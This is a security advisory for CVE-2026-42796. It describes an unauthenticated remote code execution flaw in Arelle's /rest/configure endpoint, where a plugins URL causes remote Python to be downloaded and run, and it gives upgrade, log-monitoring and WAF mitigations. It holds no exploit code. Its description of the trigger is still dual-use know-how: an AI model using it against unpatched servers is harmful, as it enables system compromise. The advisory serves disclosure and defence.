CVE-2026-42796
Arelle · Arelle
Arelle contains an unauthenticated remote code execution vulnerability in the `/rest/configure` endpoint, allowing attackers to execute malicious Python code via the plugins parameter.
Executive summary
Arelle versions before 2.39.10 are subject to a critical unauthenticated remote code execution vulnerability that allows an attacker to execute arbitrary code with the privileges of the webserver.
Vulnerability
The vulnerability resides in the /rest/configure REST endpoint, which fails to perform authentication or authorization checks. An unauthenticated attacker can supply a URL to a malicious Python file via the plugins parameter, which the Arelle process then downloads and executes.
Business impact
This vulnerability allows for full system compromise, as it enables remote code execution with the permissions of the Arelle process. With a CVSS score of 9.8, the impact includes total loss of confidentiality, integrity, and availability, potentially leading to lateral movement within the network.
Remediation
Immediate Action: Upgrade Arelle to version 2.39.10 or later immediately to restrict the plugin manager's access and enforce necessary authentication.
Proactive Monitoring: Review webserver logs for requests to /rest/configure containing unusual URLs or parameters, and monitor for unexpected child processes spawned by the Arelle service.
Compensating Controls: If an immediate update is not feasible, block network access to the /rest/configure endpoint using a Web Application Firewall (WAF) or reverse proxy to prevent unauthorized access.
Exploitation status
Public Exploit Available: Not specified
Analyst recommendation
This is a critical RCE vulnerability that requires immediate attention. Organizations running Arelle must update to the patched version as a priority to prevent unauthenticated attackers from gaining full control over the host system.